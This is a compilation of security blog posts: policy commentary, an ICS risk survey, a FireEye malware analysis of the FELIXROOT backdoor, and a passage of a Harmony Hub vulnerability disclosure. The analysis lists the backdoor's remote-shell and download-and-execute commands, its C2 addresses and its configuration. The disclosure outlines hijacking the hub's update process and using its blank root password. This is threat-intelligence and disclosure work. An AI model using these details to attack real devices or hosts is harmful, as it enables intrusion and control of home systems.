Current vulnerabilities matter because the technology that exists today is the foundation for what will exist in the future. Although no attacks targeting neurostimulators have been observed in the wild – a fact that is not altogether surprising since the numbers currently in use worldwide are low, and many are implemented in controlled research settings, several points of weakness exist that will not be hard to exploit.

Many of the potential vulnerabilities could be reduced or even eliminated by appropriate security education for clinical care teams and patients. But healthcare professionals, the security industry, the developers and manufacturers of devices and associated professional bodies all have a role to play in ensuring emerging devices are secure. We believe that collaborating to understand and address emerging risks and vulnerabilities, and doing so now while this technology is still relatively new, will pay off in the future.

 “The Memory Market: Preparing for a future where cyberthreats target your past” full report (PDF)

Beers with Talos EP40: BWT XL feat. SuperMicro, Giant Patches, and More Mobile Malware



Beers with Talos (BWT) Podcast Ep. #40 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Ep. #40 show notes: 

Recorded Oct. 19, 2018 — In celebration of episode No. 40 and hitting over 1 million downloads(!!!), we go XL. This episode is a bit long, but we go a bit deeper than usual to discuss a few things that are highly unusual — namely, the extra-large patches dropped by Oracle, and the extra-large questions surrounding the Bloomberg/Super Micro story. We also talk about a few mobile threats we have seen and what we have brewing in the mobile threat space.

The timeline:

The topics

01:25 — Roundtable: Skeevy JavaScript, Mighty Reds update, potato camera, Joel’s petty HVAC complaints, and whatever Twitter drama Craig is on about.
07:30 — Agent Tesla and Loki playing tricks.
12:30 — What’s next in mobile threats from Talos, and the problem with app store models.
24:04 — Oracle drops 302 patches. Fancy ... some would even say extravagant.
36:30 — The Super Micro Bloomberg incident: What the **** is going on here?

The links



==========

Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff).
Find all episodes here.

Subscribe via iTunes (and leave a review!)

Check out the Talos Threat Research Blog

Subscribe to the Threat Source newsletter

Follow Talos on Twitter

Give us your feedback and suggestions for topics:
beerswithtalos@cisco.com

Ireland needs a coherent national approach to cybersecurity

I was interviewed by the Irish Times on why “Ireland (is) Vulnerable to Cybersecurity Attack” During my chat with Charlie Taylor I mentioned a number of concerns I have regarding how Ireland is dealing with cybersecurity at a national level and that in many areas it is disjointed with no one department or function taking overall responsibility. The article mentions my calls for a cybersecurity tsar, but this is not the only area we need to work on.

October is known as the European Cybersecurity Awareness Month and countries throughout the EU, and indeed globally, have put together awareness campaigns aimed at their citizens and businesses alike. The whole purpose of these campaigns is to help people become more aware of the cybersecurity risks they face and to take the appropriate steps to protect themselves and others. A good awareness campaign is critical to support an effective cybersecurity strategy. However, when you go to the website for the European Agency for Network and Information Security to see which countries have government sponsored campaigns it is notable that, as per the picture below, Ireland has no such campaign.

 

This lack of support brought back to me the need for us as a nation to have an effective cybersecurity strategy to better protect our economy, infrastructure, businesses, and citizens.

I wrote about the need for a national cybersecurity strategy in a post back in 2009 “Securing Ireland’s Digital Future”. Since then we have had a strategy published in 2015 and the National Centre for Cybersecurity has been established.

The Government set up the National Cyber Security Centre in 2011 to protect critical national infrastructure. But according to a recent article in the Irish Times, a report by the public spending watchdog found that the unit has no strategic plan and needs a funding review. For anyone keen to establish Ireland as a centre for cybersecurity, then the Comptroller and Auditor General’s review of the National Cyber Security Centre made for disappointing reading.

That’s not to criticise the NCSC: it can only make do with the budget and resources it has. But the story suggests that the Government doesn’t take cybersecurity seriously. In year one, it allocated €800,000 in funding to the unit, but the following year, its funding fell below €266,000 and stayed at that level over the next three years.

The C&AG report also found that the oversight body that’s supposed to review the NCSC’s performance hasn’t met since 2015. That also happens to be the same year when the Government last published a cybersecurity strategy.

You only have to glance at the headlines to see how much of a prominent issue cybersecurity has become. Think of data breaches, DDoS attacks, online financial scams and state-sponsored activity to name just four. Ransomware infections like WannaCry and NotPetya are cost businesses and public agencies significant sums of money, not to mention disrupted operations.

The C&AG also noted that in 2017, the NCSC’s funding rose again to €1.95 million. We know from reports that the Data Protection Commissioner and the Garda’s Computer Crime Investigation Unit also had their funding increased recently. But is that funding enough for that they need?

I would argue the Government needs to go further. We need a coherent and centralised approach to protecting our nation, rather than having responsibilities for various aspects for cybersecurity spread throughout different government departments and agencies.

Given how critical cybersecurity is to our ambitions as a nation to grow as a technical hub for Europe the government should look to;

  • Establish a cysecurity tsar with the autonomy and authority to drive a cybersecurity agenda at all levels of the public service, and to engage with the private sector.
  • Engage with key stakeholders to ensure all needs are met. The Citizens’ Assembly could be an excellent model or indeed forum to adopt to identify all the relevant needs.
  • Based on the above engagement develop a revised cybersecurity strategy with a concrete action plan to achieve the goals of the strategy. Earlier this month at CyberConf in Dublin, Minister Sean Kyne said that a new cybersecurity strategy is due in 2019. That’s not a moment too soon. We’ll await that document with interest.

While cybersecurity is everyone’s responsibility it is now too critical for us as a nation, both from an economic and national security point of view, for it to be left to individual government departments or businesses to look after.

As a small nation we have the unique advantage of being able to quickly engage with all key stakeholders and to implement initiatives to make us more secure.  It is time for us to ensure the security of our nation includes the realm of cyberspace and that Ireland can become a leading light in how to create a safe online space on the internet for its citizens and businesses alike.

The post Ireland needs a coherent national approach to cybersecurity appeared first on BH Consulting.

Beers with Talos EP 39: VB 2018 Rundown and Prevalent Problems with PDF



Beers with Talos (BWT) Podcast Ep. #39 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Ep. #39 show notes: 

Recorded Oct. 5, 2018 - We start out with a quick chat to get to know this week’s special guests from the Talos Outreach team: Paul Rascagneres, Vanja Svajcer and Warren Mercer. We discuss everyone’s work that was presented at Virus Bulletin, as well as Paul and Warren being nominated for the Péter Szőr Award. We also cover a lot of vulnerability discovery work that we recently released around various PDF software.

The timeline:

The topics

01:25 - Roundtable - Intros with our special guests Warren Mercer, Vanja Svajcer and Paul Rascagneres.
07:01 - Virus Bulletin and Korea in the Crosshairs nominated for Péter Szőr Award
22:42 - Other Talos talks and internet-of-things nonsense
28:39 - PDF vulnerabilities and how vulnerabilities can come in batches
35:23 - Closing thoughts and parting shots

The links

Péter Szőr Award: https://www.virusbulletin.com/conference/peter-szor-award/
Talos PDF vulnerability posts: https://blog.talosintelligence.com/search?q=pdf&by-date=true

==========

Featuring: Nigel Houghton (@EnglishLFC). Special guests: Warren Mercer (@SecurityBeard), Paul Rascagneres (@R00tBSD), and Vanja Svajcer (@VanjaSvajcer). Hosted by Mitch Neff (@MitchNeff).

Find all episodes here.

Subscribe via iTunes (and leave a review!)

Check out the Talos Threat Research Blog

Subscribe to the Threat Source newsletter

Follow Talos on Twitter

Give us your feedback and suggestions for topics:
beerswithtalos@cisco.com

ICS Tactical Security Trends: Analysis of the Most Frequent Security Risks Observed in the Field

Introduction

FireEye iSIGHT Intelligence compiled extensive data from dozens of ICS security health assessment engagements (ICS Healthcheck) performed by Mandiant, FireEye's consulting team, to identify the most pervasive and highest priority security risks in industrial facilities. The information was acquired from hands-on assessments carried out over the last few years across a broad range of industries, including manufacturing, mining, automotive, energy, chemical, natural gas, and utilities. In this post, we provide details of these risks, and indicate best practices and recommendations to mitigate the identified risks.

Mandiant ICS Healthchecks

Mandiant ICS Healthchecks and penetration testing engagements include on-site assessments of customers' IT and ICS systems. The ICS Healthcheck consists of workshops and technical reviews. It captures the results in a final report that ranks discovered findings and vulnerabilities by risk using Mandiant’s Risk Rating method. During an onsite workshop with site technical experts, Mandiant develops a technical understanding of the subject control system(s), builds a network diagram of the control system, analyzes for potential vulnerabilities and threats, and assists with prioritizing recommended countermeasures to defend the environment.

Mandiant also collects and reviews packet captures of network traffic from the ICS environment to validate the network diagram constructed in the workshop and to identify any unexpected or undesirable deviations from the intended design. This traffic is also analyzed for evidence of compromise or misconfiguration of the ICS network/system. Mandiant inspects the deployed security technology for vulnerabilities and other architectural risks, such as inappropriately configured firewalls, dual-homed control system devices, and unnecessary connectivity to the business network or the Internet.

NOTE: Findings are discussed at a generalized level to preserve the anonymity of our customers. This post presents a high-level overview and is meant to be an informative first stop for customers interested in common cyber security issues. For more information or to request Mandiant services, please visit our website.

Methodology: Mandiant Risk Rating System

This blog post leverages information from Mandiant ICS Healthchecks, which evaluate cyber security risk in organizations from multiple industries. The rating of critical and high security risk is based on the Mandiant Risk Rating System, which is determined by identifying the exploitability and the impact of a given issue, and cross-referencing the results (Figure 1).


Figure 1: Impact/exploitability graphic

One Third of Security Risks in ICS Environments Ranked High or Critical

We reviewed findings from all of our risk assessments and then categorized and ranked the reported risks as critical or high, medium, low, or informational (Figure 2). At least 33 percent of the security issues we found in ICS organizations were rated of high or critical risk. This means they were most likely to allow adversaries to readily gain control of target systems and potentially compromise other systems or networks, cause disruption of services, disclose unauthorized information, or result in other significant negative consequences. We suggest immediate remediation for critical risks, and quick action to remediate high security risks.


Figure 2: Risk assessment distribution

Most Common High and Critical Security Risks in ICS Environments

FireEye iSIGHT Intelligence organized the critical and high security risks identified during Mandiant ICS Healthchecks into nine unique categories (Table 1). The three most common were:

  • Vulnerabilities, Patches, and Updates (32 percent)
  • Identity and Access Management (25 percent)
  • Architecture and Network Segmentation (11 percent)

In most of these cases, basic security best practices would be enough to stop (or at least make it more difficult for) threat actors to target an organization's systems. The implications are vast because specialized malware or actors targeting infrastructure would likely look for these flaws first to exploit throughout the targeted attack lifecycle.


Table 1: Distribution of high and critical security risks in ICS environments

Top Three High and Critical Risks and Recommended Mitigations

Vulnerabilities, Patches, and Updates

Vulnerability, patch, and update management procedures enable organizations to secure off-the-shelf software, hardware, and firmware from known security threats. Known vulnerabilities in ICS environments can be leveraged by threat actors to access the network and move laterally to execute targeted attacks. The following common risks were observed during our engagements:

  • Infrequent procedures for patching and updating control systems:
    • We encountered organizations with no formal vulnerability and patch management programs.
  • Out-of-date firmware, hardware, and operating systems (OS), including:
    • Network devices and systems such as switches, firewalls, and routers.
    • Hardware equipment, including desktop computers, cameras, and programmable logic controllers (PLCs).
    • Unsupported legacy operating systems such as Windows Server 2003, XP, 2000, and NT 4.
  • Unaddressed known vulnerabilities in software applications and equipment where patches are available:
    • We observed outdated firewalls with up to 53 unaddressed vulnerabilities and switches with more than 200 vulnerabilities.
    • System management software that can be exploited using known open source tools.
  • Lack of test environments to analyze patches and updates before implementation.

Mitigations

  • Develop a comprehensive ICS Vulnerability Management Strategy and include procedures to implement patches and updates on key assets. More information is provided by the National Institute for Standards and Technology's (NIST) Guide for ICS Security NIST SP800-82.
  • When patches and updates are no longer provided for key infrastructure, choose one of the two following options:
    • Implement a security perimeter around affected assets, protected by, at minimum, a firewall (industrial protocol inspection/blocking if appropriate) for access control and traffic filtering.
    • Decommission legacy devices that might be exploited to gain access to the network, such as switches.
  • Set up development systems or labs that are representative of the running IT and ICS devices. These systems can often be built from existing spares along with the purchase or loan of additional licenses for human-machine interfaces (HMIs) and configuration software from the system vendor. A development system is an excellent platform to test changes and patches, and on which to perform vulnerability scans without risk to active systems.
Identity and Access Management

The second most common category of security issues identified was related to the flaws in or absence of best practices for handling passwords and credentials. Common weaknesses identified by Mandiant include:

  • Lack of multi-factor authentication for remote access and critical accounts:
    • Users were able to remotely access ICS environments from the corporate network without requiring multi-factor authentication.
  • Lack of a comprehensive and enforced password policy:
    • Weak passwords with insufficient length or complexity used for privileged accounts, ICS user accounts, and service accounts.
    • Passwords were not changed frequently.
    • Passwords were reused for multiple accounts.
  • Prominently displayed passwords:
    • Passwords were written on the chassis of devices.
  • Hard-coded and default credentials in applications and equipment:
    • Mandiant discovered Remote Terminal Units (RTUs) containing default credentials, which are commonly available on the Internet and in the device manuals.
    • A modem contained a backdoor account incorporated by the manufacturer.
  • Commonly used “administrator” accounts.
  • Use of shared credentials.

Mitigations

  • Implement two-factor authentication for all possible users, especially administrative accounts.
  • Avoid keeping written copies of passwords and, if necessary, secure them out of sight with limited access for only authorized users.
  • Enforce password policies that require strong passwords that are regularly modified and cannot be reused. More information is available from SANS.
  • Avoid common, easily guessed user account names such as "operator," "administrator," or "admin." Instead, use uniquely named user accounts for all access.
  • Require administrative users to log in with uniquely named user accounts with strong passwords, tied back to an individual person.
  • Avoid shared accounts when feasible. However, if present, they should be hardened using strong passwords that are stored in an encrypted password manager.
Network Segregation and Segmentation

Of the top three risks identified in this post, weaknesses in network segregation and segmentation are the most important. Lack of segregation from the corporate IT network and within the ICS network allows threat actors opportunities to launch remote attacks against key infrastructure by moving laterally from IT services to ICS environments. Furthermore, it increases the risk of commodity malware spreading to ICS networks where the malware could interact with operational assets. The main risks identified by Mandiant included:

  • Plant systems accessible from the corporate network, either directly or through bridge devices (connected to both networks), such as unused servers, HMIs, historians, or loosely configured shared firewalls. We also found:
    • Unfiltered access to plant servers from corporate networks through, for example, a historian communicating with the distributed control system (DCS).
    • Missing segmentation between ICS and corporate networks.
    • Vulnerabilities in bridge devices (e.g., outdated appliances running vulnerable OS) that can enable lateral movement between networks.
    • Business functions (e.g., data backups and anti-virus updates) running on shared control system networks.
  • Dual-homed systems, both servers and desktop computers.
  • Industrial networks connected directly to the internet.

Mitigations

  • Segment all access to ICS with a network Demilitarized Zone (DMZ), as recommended by both NIST SP 800-82 and IEC (Figure 3):
    • Restrict the number of ports, services, and protocols used to establish communications between the ICS and corporate networks to the least possible to reduce the attack surface.
    • Terminate incoming access for both regular and administrative users first in the DMZ, and then establish another session with connectivity into the ICS network.
    • Place servers (or mirrored servers) that provide ICS data to the corporate network in the DMZ.
    • Use firewalls to filter all network traffic entering or leaving the ICS.
    • Firewall rules should filter both incoming traffic from the corporate network and outgoing traffic from the ICS, and they should only allow the minimum required amount of traffic to pass.
  • Isolate the control networks from the internet. A separate network should be used for internet access through a DMZ, and at no time should a bridged connection be allowed between the two networks.
  • Ensure that independent, regularly patched firewalls are used to separate the corporate network from the DMZ and ICS network, and review firewall rulesets on a regular basis.
  • Identify and redirect any non-control system traffic traversing the industrial network.
  • Eliminate all dual-homed servers and hosts.


Figure 3: Reference architecture for segmentation of enterprise and control system networks

Additional Highlights

Additional common risks were identified from other categories, but with less frequency.

Network Management and Monitoring
  • We identified the lack of Network Security Monitoring, Intrusion Detection, and Intrusion Prevention in organizations, including missing endpoint malware protection, leaving unused ports active, and having limited visibility into ICS networks. We recommend the following best practices:
    • A comprehensive network security monitoring strategy should be defined and implemented at the ICS level as part of an overarching ICS security program. Special attention should be placed on monitoring network segments where external connectivity occurs:
  • Implement or increase centralized system and network logging to provide visibility across the entire enterprise (IT and ICS). Monitor logs for anomalous behavior. Consider implementing additional host or network-based security controls that generate alerts or reject traffic based on anomalous or suspicious behavior.
  • Install a centrally managed anti-malware solution on all ICS and ICS DMZ hosts. Ensure that signature and application updates are deployed in a timely manner.
  • Explore alternatives for the deployment of an advanced endpoint protection solution that provides detection/prevention for malware and malicious activities that do not rely on signature-based detection methods.
  • Develop procedures to identify and shut down network ports when not in use.
Misconfigurations in Firewall Rules

We identified weak firewall rules including "ANY-ANY" configurations, conflicting or overlapping rules, overly permissive conditions allowing access to administrative services, and lack of console connection timeouts. We recommend the following best practices for secure firewall configuration:

  • Filtering rules should only allow access from/to specific source/destination IP addresses and ports.
  • Filter rules should specify a specific network protocol.
  • ICMP filter rules should specify a specific message type.
  • Filter rules should drop network packets instead of rejecting them.
  • Filter rules should perform a specific action and not rely on a default action.
  • Administrative session timeout parameters should be set to terminate those sessions after a predetermined amount of time.
Cyber Security Governance Best Practices

We identified some organizations with limited or absent formal and comprehensive ICS security programs. We highly suggest organizations implement ICS security programs to prioritize the following recommendations:

  • Establish a formal ICS security program with a clearly defined owner, accountability, and governance structure. It should include:
    • Business expectations, policies, and technical standards for ICS security.
    • Guidance on proactive security controls (e.g., implementation of patches and updates, change management, or secure configurations).
    • Incident Response, Disaster Recovery, and Business Continuity plans.
    • ICS security awareness training plans.
  • Develop a Vulnerability Management Strategy following NIST SP800-82, including asset identification and inventory, risk assessment and analysis methodology (with prioritization of critical assets), remediation testing, and deployment guidelines.

Conclusion

This blog post presents a broad picture of the current risks facing industrial organizations as observed during Mandiant ICS Healthchecks. While the trends observed in this research align with risk areas commonly discussed in security conference talks and media reports, this blog draws from dozens of on-site assessments that hold real-life validity.

Our findings indicate that at least one third of the critical and high security risks in ICS are related to vulnerabilities, patches, and updates. Known vulnerabilities continue to represent significant challenges for ICS owners that must oversee the daily operation of thousands of assets in complex industrial environments. It is also relevant to highlight that some of the most common risks we identified could be mitigated with security best practices, such as enforcing a comprehensive password management policy or establishing detailed firewall rules. If you are interested in more information or to request Mandiant services, please visit our website.

Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign

Campaign Details

In September 2017, FireEye identified the FELIXROOT backdoor as a payload in a campaign targeting Ukrainians and reported it to our intelligence customers. The campaign involved malicious Ukrainian bank documents, which contained a macro that downloaded a FELIXROOT payload, being distributed to targets.

FireEye recently observed the same FELIXROOT backdoor being distributed as part of a newer campaign. This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim’s machine. Figure 1 shows the attack overview.


Figure 1: Attack overview

The malware is distributed via Russian-language documents (Figure 2) that are weaponized with known Microsoft Office vulnerabilities. In this campaign, we observed threat actors exploiting CVE-2017-0199 and CVE-2017-11882 to distribute malware. The malicious document used is named “Seminar.rtf”. It exploits CVE-2017-0199 to download the second stage payload from 193.23.181.151 (Figure 3). The downloaded file is weaponized with CVE-2017-11882.


Figure 2: Lure documents


Figure 3: Hex dump of embedded URL in Seminar.rtf

Figure 4 shows the first payload trying to download the second stage Seminar.rtf.


Figure 4: Downloading second stage Seminar.rtf

The downloaded Seminar.rtf contains an embedded binary file that is dropped in %temp% via Equation Editor executable. This file drops the executable at %temp% (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9), which is used to drop and execute the FELIXROOT dropper component (MD5: 92F63B1227A6B37335495F9BCB939EA2).

The dropped executable (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9) contains the compressed FELIXROOT dropper component in the Portable Executable (PE) binary overlay section. When it is executed, it creates two files: an LNK file that points to %system32%\rundll32.exe, and the FELIXROOT loader component. The LNK file is moved to the startup directory. Figure 5 shows the command in the LNK file to execute the loader component of FELIXROOT.


Figure 5: Command in LNK file

The embedded backdoor component is encrypted using custom encryption. The file is decrypted and loaded directly in memory without touching the disk.

Technical Details

After successful exploitation, the dropper component executes and drops the loader component. The loader component is executed via RUNDLL32.EXE. The backdoor component is loaded in memory and has a single exported function.

Strings in the backdoor are encrypted using a custom algorithm that uses XOR with a 4-byte key. Decryption logic used for ASCII strings is shown in Figure 6.


Figure 6: ASCII decryption routine

Decryption logic used for Unicode strings is shown in Figure 7.


Figure 7: Unicode decryption routine

Upon execution, a new thread is created where the backdoor sleeps for 10 minutes. Then it checks to see if it was launched by RUNDLL32.exe along with parameter #1. If the malware was launched by RUNDLL32.exe with parameter #1, then it proceeds with initial system triage before doing command and control (C2) network communications. Initial triage begins with connecting to Windows Management Instrumentation (WMI) via the “ROOT\CIMV2” namespace.

Figure 8 shows the full operation.


Figure 8: Initial execution process of backdoor component

Table 1 shows the classes referred from the “ROOT\CIMV2” and “Root\SecurityCenter2” namespace.

WMI Namespaces

Win32_OperatingSystem

Win32_ComputerSystem

AntiSpywareProduct

AntiVirusProduct

FirewallProduct

Win32_UserAccount

Win32_NetworkAdapter

Win32_Process

Table 1: Referred classes

WMI Queries and Registry Keys Used

  1. SELECT Caption FROM Win32_TimeZone
  2. SELECT CSNAME, Caption, CSDVersion, Locale, RegisteredUser FROM Win32_OperatingSystem
  3. SELECT Manufacturer, Model, SystemType, DomainRole, Domain, UserName FROM Win32_ComputerSystem

Registry entries are read for potential administration escalation and proxy information.

  1. Registry key “SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ” is queried to check the values ConsentPromptBehaviorAdmin and PromptOnSecureDesktop.
  2. Registry key “Software\Microsoft\Windows\CurrentVersion\Internet Settings\” is queried to gather proxy information with values ProxyEnable, Proxy: (NO), Proxy, ProxyServer.

Table 2 shows FELIXROOT backdoor capabilities. Each command is performed in an individual thread.

Command

Description

0x31

Fingerprint System via WMI and Registry

0x32

Drop File and execute

0x33

Remote Shell

0x34

Terminate connection with C2

0x35

Download and run batch script

0x36

Download file on machine

0x37

Upload File

Table 2: FELIXROOT backdoor commands

Figure 9 shows the log message decrypted from memory using the same mechanism shown in Figure 6 and Figure 7 for every command executed.


Figure 9: Command logs after execution

Network Communications

FELIXROOT communicates with its C2 via HTTP and HTTPS POST protocols. Data sent over the network is encrypted and arranged in a custom structure. All data is encrypted with AES, converted into Base64, and sent to the C2 server (Figure 10).


Figure 10: POST request to C2 server

All other fields, such as User-Agents, Content-Type, and Accept-Encoding, that are part of the request / response header are XOR encrypted and present in the malware. The malware queries the Windows API to get the computer name, user name, volume serial number, Windows version, processor architecture and two additional values, which are “1.3” and “KdfrJKN”. The value “KdfrJKN” may be used as identification for the campaign and is found in the JOSN object in the file (Figure 11).


Figure 11: Host information used in every communication

The FELIXROOT backdoor has three parameters for C2 communication. Each parameter provides information about the task performed on the target machine (Table 3).

Parameter

Description

‘u=’

This parameter contains target machine information in the following format:

<Computer Name>, <User Name>, <Windows Versions>, <Processor Architecture>, <1.3>, < KdfrJKN >, <Volume Serial Number>

‘&h=’

This parameter includes the information about the command executed and its results.

‘&p=’

This parameter contains the information about data associated with the C2 server.

Table 3: FELIXROOT backdoor parameters

Cryptography

All data is transferred to C2 servers using AES encryption and the IbindCtx COM interface using HTTP or HTTPS protocol. The AES key is unique for each communication and is encrypted with one of two RSA public keys. Figure 12 and Figure 13 show the RSA keys used in FELIXROOT, and Figure 14 shows the AES encryption parameters.


Figure 12: RSA public key 1


Figure 13: RSA public key 2


Figure 14: AES encryption parameters

After encryption, the cipher text to be sent over C2 is Base64 encoded. Figure 15 shows the structure used to send data to the server, and Figure 16 shows the structural representation of data used in C2 communications.


Figure 15: Structure used to send data to server


Figure 16: Structure used to send data to C2 server

The structure is converted to Base64 using the CryptBinaryToStringA function.

FELIXROOT backdoor contains several commands for specific tasks. After execution of every task, the malware sleeps for one minute before executing the next task. Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine:

  1. Deletes the LNK file from the startup directory.
  2. Deletes the registry key HKCU\Software\Classes\Applications\rundll32.exe\shell\open
  3. Deletes the dropper components from the system.

Conclusion

CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing. Threat actors will increasingly leverage these vulnerabilities in their attacks until they are no longer finding success, so organizations must ensure they are protected. At this time of writing, FireEye Multi Vector Execution (MVX) engine is able to recognize and block this threat. We also advise that all industries remain on alert, as the threat actors involved in this campaign may eventually broaden the scope of their current targeting.

Appendix

Indicators of Compromise

11227ECA89CC053FB189FAC3EBF27497

Seminar.rtf

4DE5ADB865B5198B4F2593AD436FCEFF

Seminar.rtf

78734CD268E5C9AB4184E1BBE21A6EB9

Zam<RandomNumber>.doc

92F63B1227A6B37335495F9BCB939EA2

FELIXROOT Dropper

DE10A32129650849CEAF4009E660F72F

FELIXROOT Backdoor

Table 4: FELIXROOT IOCs

Network Indicators of Compromise

217.12.204.100/news

217.12.204.100:443/news

193.23.181.151/Seminar.rtf

Accept-Encoding: gzip, deflate

content-Type: application/x-www-form-urlencoded

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Configuration Files

Version 1:

{"1" : "https://88.198.13.116:8443/xmlservice","2" : "30","4" : "GufseGHbc","6" : "3", "7" :

“http://88.198.13.116:8080/xmlservice"}

Version 2:

{"1" : "https://217.12.204.100/news/","2" : "30","4" : "KdfrJKN","6" : "3", "7" :

"http://217.12.204.100/news/"}

FireEye Detections

MD5

Product

Signature

Action

11227ECA89CC053FB189FAC3EBF27497

NX/EX/AX

Malware.Binary.rtf

Block

4DE5ADB865B5198B4F2593AD436FCEFF

NX/EX/AX

Malware.Binary.rtf

Block

78734CD268E5C9AB4184E1BBE21A6EB9

NX/EX/AX

Malware.Binary

Block

92F63B1227A6B37335495F9BCB939EA2

NX/EX/AX

FE_Dropper_Win32_FELIXROOT_1

Block

DE10A32129650849CEAF4009E660F72F

NX/EX/AX

FE_Backdoor_Win32_FELIXROOT_2

Block

11227ECA89CC053FB189FAC3EBF27497

HX

IOC

Alert

4DE5ADB865B5198B4F2593AD436FCEFF

HX

IOC

Alert

Table 5: FireEye Detections

Acknowledgements

Special thanks to Jonell Baltazar, Alex Berry and Benjamin Read for their contributions to this blog.

Rooting a Logitech Harmony Hub: Improving Security in Today’s IoT World

Introduction

FireEye’s Mandiant Red Team recently discovered vulnerabilities present on the Logitech Harmony Hub Internet of Things (IoT) device that could potentially be exploited, resulting in root access to the device via SSH. The Harmony Hub is a home control system designed to connect to and control a variety of devices in the user’s home. Exploitation of these vulnerabilities from the local network could allow an attacker to control the devices linked to the Hub as well as use the Hub as an execution space to attack other devices on the local network. As the Harmony Hub device list includes support for devices such as smart locks, smart thermostats as well as other smart home devices, these vulnerabilities present a very high risk to the users.

FireEye disclosed these vulnerabilities to Logitech in January 2018. Logitech was receptive and has coordinated with FireEye to release this blog post in conjunction with a firmware update (4.15.96) to address these findings.

The Red Team discovered the following vulnerabilities:

  • Improper certificate validation
  • Insecure update process
  • Developer debugging symbols left in the production firmware image
  • Blank root user password

The Red Team used a combination of the vulnerabilities to gain administrative access to the Harmony Hub. This blog post outlines the discovery and analysis process, and demonstrates the necessity of rigorous security testing of consumer devices – particularly as the public places an increasing amount of trust in devices that are not just connected to home networks, but also give access to many details about the daily lives of their users.

Device Analysis

Device Preparation

Publicly available research indicated the presence of a universal asynchronous receiver/transmitter (UART) interface on some of the test points on the Harmony Hub. We soldered jumper wires to the test pads, which allowed us to connect to the Harmony Hub using a TTL to USB serial cable. Initial analysis of the boot process showed that the Harmony Hub booted via U-Boot 1.1.4 and ran a Linux kernel (Figure 1).


Figure 1: Initial boot log output from UART interface

After this point in the boot process, the console stopped returning output because the kernel was not configured with any console interfaces. We reconfigured the kernel boot parameters in U-Boot to inspect the full boot process, but no useful information was recovered. Furthermore, because the UART interface was configured to only transmit, no further interaction could be performed with the Harmony Hub on this interface. Therefore, we shifted our focus to gaining a better understanding of the Linux operating system and associated software running on the Harmony Hub.

Firmware Recovery and Extraction

The Harmony Hub is designed to pair with a companion Android or iOS application over Bluetooth for its initial configuration. We created a wireless network with hostapd and installed a Burp Suite Pro CA certificate on a test Android device to intercept traffic sent by the Harmony mobile application to the Internet and to the Harmony Hub. Once initial pairing is complete, the Harmony application searches for Harmony Hubs on the local network and communicates with the Harmony Hub over an HTTP-based API.

Once connected, the Harmony application sends two different requests to Harmony Hub’s API, which cause the Harmony Hub to check for updates (Figure 2).


Figure 2: A query to force the Harmony Hub to check for updates

The Harmony Hub sends its current firmware version to a Logitech server to determine if an update is available (Figure 3). If an update is available, the Logitech server sends a response containing a URL for the new firmware version (Figure 4). Despite using a self-signed certificate to intercept the HTTPS traffic sent by the Harmony Hub, we were able to observe this process – demonstrating that the Harmony Hub ignores invalid SSL certificates.


Figure 3: The Harmony Hub checks for updates to its firmware


Figure 4: The server sends a response with a URL for the updated firmware

We retrieved this firmware and examined the file. After extracting a few layers of archives, the firmware can be found in the harmony-image.squashfs file. This filesystem image is a SquashFS filesystem compressed with lzma, a common format for embedded devices. However, vendors often use old versions of squashfstools that are incompatible with more recent squashfstools builds. We used the unsqashfs_all.sh script included in firmware-mod-kit to automate the process of finding the correct version of unsquashfs to extract the filesystem image (Figure 5).


Figure 5: Using firmware-mod-kit to extract the filesystem

With the filesystem contents extracted, we investigated some of the configuration details of the Harmony Hub’s operating system. Inspection revealed that various debug details were available in the production image, such as kernel modules that were not stripped (Figure 6).


Figure 6: Unstripped Linux kernel objects on the filesystem

Investigation of /etc/passwd showed that the root user had no password configured (Figure 7). Therefore, if we can enable the dropbear SSH server, we can gain root access to the Harmony Hub through SSH without a password.


Figure 7: /etc/passwd shows no password is configured for the root user

We observed that an instance of a dropbear SSH server will be enabled during initialization if the file /etc/tdeenable is present in the filesystem (Figure 8).


Figure 8: A dropbear SSH server is enabled by /etc/init.d/rcS script if /etc/tdeenable is present

Hijacking Update Process

During the initialization process, the Harmony Hub queries the GetJson2Uris endpoint on the Logitech API to obtain a list of URLs to use for various processes (Figure 9), such as the URL to use when checking for updated firmware or a URL to obtain information about updates’ additional software packages.


Figure 9: The request to obtain a list of URL endpoints for various processes

We intercepted and modified the JSON object in the response from the server to point the GetUpdates member to our own IP address, as shown in Figure 10.


Figure 10: The modified JSON object member

Similar to the firmware update process, the Harmony Hub sends a POST request to the endpoint specified by GetUpdates containing the current versions of its internal software packages. The request shown in Figure 11 contains a sample request for the HEOS package.


Figure 11: The JSON request object containing the current version of the “HEOS” package

